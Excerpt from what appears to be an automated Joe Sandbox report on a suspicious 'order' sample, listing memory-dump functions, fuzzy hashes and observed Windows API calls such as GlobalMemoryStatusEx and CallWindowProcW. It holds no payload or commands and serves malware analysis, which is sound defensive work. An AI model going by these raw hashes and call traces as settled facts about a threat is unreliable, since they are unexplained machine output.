                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c1f4afc02065f2a069a2d53a9343689bd7eb8594ca9e65993a56c5d8d110ec78
                                                  • Instruction ID: a93ff91090e009e3c596418166177a8b8a114be4e78cb5e735bb0f3f3b7c8805
                                                  • Opcode Fuzzy Hash: c1f4afc02065f2a069a2d53a9343689bd7eb8594ca9e65993a56c5d8d110ec78
                                                  • Instruction Fuzzy Hash: 2AD1F435D1075A8ACB11EF68D994AD9F7B1FFA5300F10C7AAE1093B210EB706AD5CB91
                                                  Function 0165D55C Relevance: .3, Instructions: 264COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1276743809.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1650000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6b86e2aec983ab7371a4a9d8b3452f3d79addf1e32abe49282632b91718ab302
                                                  • Instruction ID: 7b8e5f260d5a6fe94c5297d57ab7b33620e767a739640ee88e3922099f8b1b6f
                                                  • Opcode Fuzzy Hash: 6b86e2aec983ab7371a4a9d8b3452f3d79addf1e32abe49282632b91718ab302
                                                  • Instruction Fuzzy Hash: 86A17D32E002168FCF55DFB4CC445AEBBB2FF85301B1585AAED06AB265DB31E916CB40
                                                  Function 05909848 Relevance: .3, Instructions: 264COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1285227499.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5900000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 44c818a75cf76f3ee0ef1f749685fdce9be60085ff0b6e2ffbe37750761e0321
                                                  • Instruction ID: d19067d4775faa1407dd755b45f6932ec92f13bbaa3e8a40129a275dfc58f0ca
                                                  • Opcode Fuzzy Hash: 44c818a75cf76f3ee0ef1f749685fdce9be60085ff0b6e2ffbe37750761e0321
                                                  • Instruction Fuzzy Hash: FDD1F435D1075A8ACB11EF68D994AD9F7B1FFA5300F10C7AAE1093B210EB706AD5CB91
                                                  Function 07AA4F70 Relevance: .1, Instructions: 138COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de6f6cb90ded0e6e33f6e89c53601450c37887f86cbd3513ec668124b8924bae
                                                  • Instruction ID: 8ae658cd9ffcaf6983cc8479b89a3c85c6cc9f1cc3488296241931d8b406b441
                                                  • Opcode Fuzzy Hash: de6f6cb90ded0e6e33f6e89c53601450c37887f86cbd3513ec668124b8924bae
                                                  • Instruction Fuzzy Hash: 62512EB0E042199FDB14DFA9C5445AEFBF2FF89304F248169D418AB315D7319A42CFA1
                                                  Function 07AA2C0F Relevance: .1, Instructions: 137COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6a208b09678065c747fe486885eccbf87badb38f338b16cd5b1e3da791657438
                                                  • Instruction ID: 9c3170d7d2944433794f3674e30285c85e0c67c11bd6358876ce5d4d5adce871
                                                  • Opcode Fuzzy Hash: 6a208b09678065c747fe486885eccbf87badb38f338b16cd5b1e3da791657438
                                                  • Instruction Fuzzy Hash: AF5131B5E042199FDB14CFA9C5846AEFBF2FF89304F248169C418AB356D7359941CF90
                                                  Function 07AA3493 Relevance: .1, Instructions: 133COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1286784900.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c0b968f5b67f08b8c0114f475aa0ee78759151ae659dd028cbc807dc2e9848ee
                                                  • Instruction ID: bb113467eee56a1f7304da1f57b768294e729f631c76d95f1fd18d905bba914e
                                                  • Opcode Fuzzy Hash: c0b968f5b67f08b8c0114f475aa0ee78759151ae659dd028cbc807dc2e9848ee
                                                  • Instruction Fuzzy Hash: 9B512CB4E002199FDB14DFA9C5845AEFBF2FF89304F24816AD418AB315D7349942CFA1

                                                  Execution Graph

                                                  Execution Coverage:9.2%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:52
                                                  Total number of Limit Nodes:7
                                                  execution_graph 35036 65c3dd8 35037 65c3e00 35036->35037 35040 65c3e2c 35036->35040 35038 65c3e09 35037->35038 35041 65c325c 35037->35041 35042 65c3267 35041->35042 35044 65c4123 35042->35044 35045 65c3278 35042->35045 35044->35040 35046 65c4158 OleInitialize 35045->35046 35047 65c41bc 35046->35047 35047->35044 35048 2c6c120 DuplicateHandle 35049 2c6c1b6 35048->35049 35069 65c1ac0 35073 65c1ae0 35069->35073 35077 65c1ada 35069->35077 35070 65c1aca 35074 65c1b22 35073->35074 35076 65c1b29 35073->35076 35075 65c1b7a CallWindowProcW 35074->35075 35074->35076 35075->35076 35076->35070 35078 65c1ae0 35077->35078 35079 65c1b7a CallWindowProcW 35078->35079 35080 65c1b29 35078->35080 35079->35080 35080->35070 35050 2c67e88 35051 2c67e8d 35050->35051 35052 2c67eab 35051->35052 35054 2c690f8 35051->35054 35055 2c69102 35054->35055 35056 2c69122 35055->35056 35059 65a2f48 35055->35059 35064 65a2f38 35055->35064 35056->35051 35061 65a2f5d 35059->35061 35060 65a31a8 35060->35056 35061->35060 35062 65a35c8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 35061->35062 35063 65a35d8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 35061->35063 35062->35061 35063->35061 35065 65a2f5d 35064->35065 35066 65a31a8 35065->35066 35067 65a35d8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 35065->35067 35068 65a35c8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 35065->35068 35066->35056 35067->35065 35068->35065 35081 2c6c738 35083 2c6c766 35081->35083 35085 2c6bca4 35083->35085 35084 2c6c786 35084->35084 35086 2c6bcaf 35085->35086 35087 2c6ee4f 35086->35087 35090 65c4370 35086->35090 35094 65c4360 35086->35094 35087->35084 35092 65c43d5 35090->35092 35091 65c4838 WaitMessage 35091->35092 35092->35091 35093 65c4422 35092->35093 35093->35087 35097 65c4370 35094->35097 35095 65c4838 WaitMessage 35095->35097 35096 65c4422 35096->35087 35097->35095 35097->35096

                                                  Executed Functions

                                                  Function 065C4370 Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1899 65c4370-65c43d3 1900 65c43d5-65c43ff 1899->1900 1901 65c4402-65c4420 1899->1901 1900->1901 1906 65c4429-65c4460 1901->1906 1907 65c4422-65c4424 1901->1907 1911 65c4466-65c447a 1906->1911 1912 65c4891 1906->1912 1909 65c48e2-65c48f7 1907->1909 1913 65c447c-65c44a6 1911->1913 1914 65c44a9-65c44c8 1911->1914 1915 65c4896-65c48ac 1912->1915 1913->1914 1921 65c44ca-65c44d0 1914->1921 1922 65c44e0-65c44e2 1914->1922 1915->1909 1924 65c44d4-65c44d6 1921->1924 1925 65c44d2 1921->1925 1926 65c44e4-65c44fc 1922->1926 1927 65c4501-65c450a 1922->1927 1924->1922 1925->1922 1926->1915 1928 65c4512-65c4519 1927->1928 1929 65c451b-65c4521 1928->1929 1930 65c4523-65c452a 1928->1930 1931 65c4537-65c454d call 65c32d8 1929->1931 1932 65c452c-65c4532 1930->1932 1933 65c4534 1930->1933 1935 65c4552-65c4554 1931->1935 1932->1931 1933->1931 1936 65c46a9-65c46ad 1935->1936 1937 65c455a-65c4561 1935->1937 1938 65c487c-65c488f 1936->1938 1939 65c46b3-65c46b7 1936->1939 1937->1912 1940 65c4567-65c45a4 1937->1940 1938->1915 1941 65c46b9-65c46cc 1939->1941 1942 65c46d1-65c46da 1939->1942 1948 65c45aa-65c45af 1940->1948 1949 65c4872-65c4876 1940->1949 1941->1915 1943 65c46dc-65c4706 1942->1943 1944 65c4709-65c4710 1942->1944 1943->1944 1946 65c47af-65c47c4 1944->1946 1947 65c4716-65c471d 1944->1947 1946->1949 1962 65c47ca-65c47cc 1946->1962 1951 65c474c-65c476e 1947->1951 1952 65c471f-65c4749 1947->1952 1953 65c45e1-65c45f6 call 65c32fc 1948->1953 1954 65c45b1-65c45bf call 65c32e4 1948->1954 1949->1928 1949->1938 1951->1946 1989 65c4770-65c477a 1951->1989 1952->1951 1960 65c45fb-65c45ff 1953->1960 1954->1953 1964 65c45c1-65c45df call 65c32f0 1954->1964 1965 65c4670-65c467d 1960->1965 1966 65c4601-65c4613 call 65c3308 1960->1966 1967 65c47ce-65c4807 1962->1967 1968 65c4819-65c4836 call 65c32d8 1962->1968 1964->1960 1965->1949 1981 65c4683-65c468d call 65c3318 1965->1981 1993 65c4615-65c4645 1966->1993 1994 65c4653-65c466b 1966->1994 1984 65c4809-65c480f 1967->1984 1985 65c4810-65c4817 1967->1985 1968->1949 1980 65c4838-65c4864 WaitMessage 1968->1980 1986 65c486b 1980->1986 1987 65c4866 1980->1987 1995 65c469c-65c46a4 call 65c3330 1981->1995 1996 65c468f-65c4697 call 65c3324 1981->1996 1984->1985 1985->1949 1986->1949 1987->1986 2000 65c477c-65c4782 1989->2000 2001 65c4792-65c47ad 1989->2001 2003 65c464c 1993->2003 2004 65c4647 1993->2004 1994->1915 1995->1949 1996->1949 2007 65c4784 2000->2007 2008 65c4786-65c4788 2000->2008 2001->1946 2001->1989 2003->1994 2004->2003 2007->2001 2008->2001
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2507920215.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_65c0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 06c31f1ac11e63b899149efba2f65817b79504be21b4993cbb60c88f58302948
                                                  • Instruction ID: 591b57beab3245caf4a5782cba84d05465c22b1e102eed5a17d593c01d01740b
                                                  • Opcode Fuzzy Hash: 06c31f1ac11e63b899149efba2f65817b79504be21b4993cbb60c88f58302948
                                                  • Instruction Fuzzy Hash: 50F11734E00209CFEB64DFA9C954FADBBF1BF88324F158569E405AB265DB70A945CF80
                                                  Function 065A3DB0 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2011 65a3db0-65a3dbb 2012 65a3dbd-65a3ddc call 65a34e0 2011->2012 2013 65a3de5-65a3e04 call 65a34ec 2011->2013 2016 65a3de0-65a3de4 2012->2016 2020 65a3e0a-65a3e4c 2013->2020 2021 65a3e06-65a3e09 2013->2021 2020->2016 2026 65a3e4e-65a3e69 2020->2026 2029 65a3e6b-65a3e6e 2026->2029 2030 65a3e6f-65a3efc GlobalMemoryStatusEx 2026->2030 2034 65a3efe-65a3f04 2030->2034 2035 65a3f05-65a3f2d 2030->2035 2034->2035
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2507894347.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_65a0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6429223aca0b763b4637e0396c84cc1f5f1979c7dd55af959d7319dfb2654ee3
                                                  • Instruction ID: 067425b18a13bb27b3c59189729c5690aa213d0fdc5c01bd8f3a2d7417b92f76
                                                  • Opcode Fuzzy Hash: 6429223aca0b763b4637e0396c84cc1f5f1979c7dd55af959d7319dfb2654ee3
                                                  • Instruction Fuzzy Hash: 75410232E043569FCB14DFAAD8046DEBBF5EF89220F14856AE404E7241DB789845CBE1
                                                  Function 065C1AE0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2038 65c1ae0-65c1b1c 2039 65c1bcc-65c1bec 2038->2039 2040 65c1b22-65c1b27 2038->2040 2046 65c1bef-65c1bfc 2039->2046 2041 65c1b29-65c1b60 2040->2041 2042 65c1b7a-65c1bb2 CallWindowProcW 2040->2042 2048 65c1b69-65c1b78 2041->2048 2049 65c1b62-65c1b68 2041->2049 2044 65c1bbb-65c1bca 2042->2044 2045 65c1bb4-65c1bba 2042->2045 2044->2046 2045->2044 2048->2046 2049->2048
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 065C1BA1
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2507920215.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_65c0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: 1958dec6ffaecfda5c91385aa016ebbda1642ac9092e6d630d36907c5a9afc72
                                                  • Instruction ID: 9040bc443779813960e5f86129759ac9fcae7fdd45a9fd912457772c8f66b370
                                                  • Opcode Fuzzy Hash: 1958dec6ffaecfda5c91385aa016ebbda1642ac9092e6d630d36907c5a9afc72
                                                  • Instruction Fuzzy Hash: 3C4138B9900705CFDB54CF99C448A9ABBF5FF88324F24845DE419AB321D375A841CFA0
                                                  Function 02C6C118 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C6C1A7
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2504098433.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c60000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 55ee38b4092a8f96a06ab80bfcc93be3a2bb36a8f6c28e0a65abaa35924008f2
                                                  • Instruction ID: fe7386c46acb97f717e8e4b0871d0a0adda0674b4a28a53d6ecd0650dc67b8ee
                                                  • Opcode Fuzzy Hash: 55ee38b4092a8f96a06ab80bfcc93be3a2bb36a8f6c28e0a65abaa35924008f2
                                                  • Instruction Fuzzy Hash: 452105B6D00209EFDB10CF99D984ADEBBF4EB48310F14801AE954A7350C335A940CFA1
                                                  Function 02C6C120 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C6C1A7
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2504098433.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c60000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 62f71c9a007d3df4f21aeaf42129f0caf4b52979ce4c00f468b2566ddc25944e
                                                  • Instruction ID: c55ed1b15d3a4fb372ae3f472bdb18989df29e83ac891dc8eb98de87d1943611
                                                  • Opcode Fuzzy Hash: 62f71c9a007d3df4f21aeaf42129f0caf4b52979ce4c00f468b2566ddc25944e
                                                  • Instruction Fuzzy Hash: 9221C4B6D00249EFDB10CF9AD984ADEBBF4EB48310F14841AE954A7350D379AA44CF65
                                                  Function 065A34EC Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,065A3E02), ref: 065A3EEF
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2507894347.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_65a0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 7f2f9473c1fe9ac55f1b6eea928e40a82a6af50a721d31dc21abb9a5a1d10099
                                                  • Instruction ID: af9e5ede4e1a62a98b758c8132231206480a78b8a58dfcb110c1a4dd759d3bd3
                                                  • Opcode Fuzzy Hash: 7f2f9473c1fe9ac55f1b6eea928e40a82a6af50a721d31dc21abb9a5a1d10099
                                                  • Instruction Fuzzy Hash: E411F2B2C0465A9FDB10DF9AC444BDEFBF4AB48224F11816AE818A7241D378A940CFA5
                                                  Function 065A3E81 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,065A3E02), ref: 065A3EEF
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2507894347.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_65a0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 82fd0636c59e8e3e9ba7535659075c998b83bade23210a288590c3fd692374b8
                                                  • Instruction ID: 8c449d2a0666cbd8d4dc2c39ccc8496c0209b0b4dd538fbd40894cbb90bc6361
                                                  • Opcode Fuzzy Hash: 82fd0636c59e8e3e9ba7535659075c998b83bade23210a288590c3fd692374b8
                                                  • Instruction Fuzzy Hash: B71136B2C0025A9FDB10CF9AC444BEEFBF4AF48310F10812AE818A7641D378A901CFA5
                                                  Function 065C4152 Relevance: 1.5, APIs: 1, Instructions: 49comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 065C41AD
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2507920215.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_65c0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: 9e6873266f5f2b5ebf685073ffa1338952d6249d299779121208514614ec17a7
                                                  • Instruction ID: bb1fe3762a5da73357046e4a45e67516a6b687f02b3c4edd219702d749973a28
                                                  • Opcode Fuzzy Hash: 9e6873266f5f2b5ebf685073ffa1338952d6249d299779121208514614ec17a7
                                                  • Instruction Fuzzy Hash: 201103B59003489FDB20DF9AD845BCEBBF8EB48320F108419E559A7300C779A544CFA5
                                                  Function 065C3278 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 065C41AD
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2507920215.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_65c0000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: 62fd6e5c6b5fb9e252b0e76e3d409ef4d281b395e4b09259cbdff6e39dbb2ea9
                                                  • Instruction ID: d85b940889e546743728b80b16793347284042cdcc925c879bee93a35e3872b2
                                                  • Opcode Fuzzy Hash: 62fd6e5c6b5fb9e252b0e76e3d409ef4d281b395e4b09259cbdff6e39dbb2ea9
                                                  • Instruction Fuzzy Hash: BB1103B5900348CFDB20DF9AD444BDEBBF4EB48220F108419E559A7300C379A944CFA5
                                                  Function 02C1D01C Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2503807220.0000000002C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C1D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c1d000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bbf25deda355df716e9afff8e077f248b9ab1dc3d7c4f8e421216a44f73ad9e3
                                                  • Instruction ID: f67f7a2ed8781d2d41c6c37165f10aebbecbc796d4494abfc58101705ea87805
                                                  • Opcode Fuzzy Hash: bbf25deda355df716e9afff8e077f248b9ab1dc3d7c4f8e421216a44f73ad9e3
                                                  • Instruction Fuzzy Hash: 4A21F275604300EFDB14DF24D9C5B26BB65FB85314F20C5ADE80B4B296C33AD847DAA2
                                                  Function 02C1D005 Relevance: .1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2503807220.0000000002C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C1D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2c1d000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ccef12699c6b06031eb40571c465ed2f7e97f1e80f59497911e2ccd524b8ac70
                                                  • Instruction ID: b69e554a92adec67328de4afe3c547159789c79eee3d08381cad271bdd2493ee
                                                  • Opcode Fuzzy Hash: ccef12699c6b06031eb40571c465ed2f7e97f1e80f59497911e2ccd524b8ac70
                                                  • Instruction Fuzzy Hash: B42192755093C09FCB12CF24D590715BF71EB86214F28C5DAD8498F6A7C33A980ADBA2
                                                  Function 0124D628 Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2503501586.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_124d000_order2024-10-07_174915.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9386233cfd8f4401ac2cc5091cf8419686b396e7731f14e436766f630fdc1868
                                                  • Instruction ID: ea8ba869a2c76f55ad07f56382778bbd9ef0dda6cb48c5cfb5135fe8c2276549
                                                  • Opcode Fuzzy Hash: 9386233cfd8f4401ac2cc5091cf8419686b396e7731f14e436766f630fdc1868
                                                  • Instruction Fuzzy Hash: 38F06272445344AFEB248E1AD984B66FF98EB51624F18C55AFE0C4F287C27A9844CAB1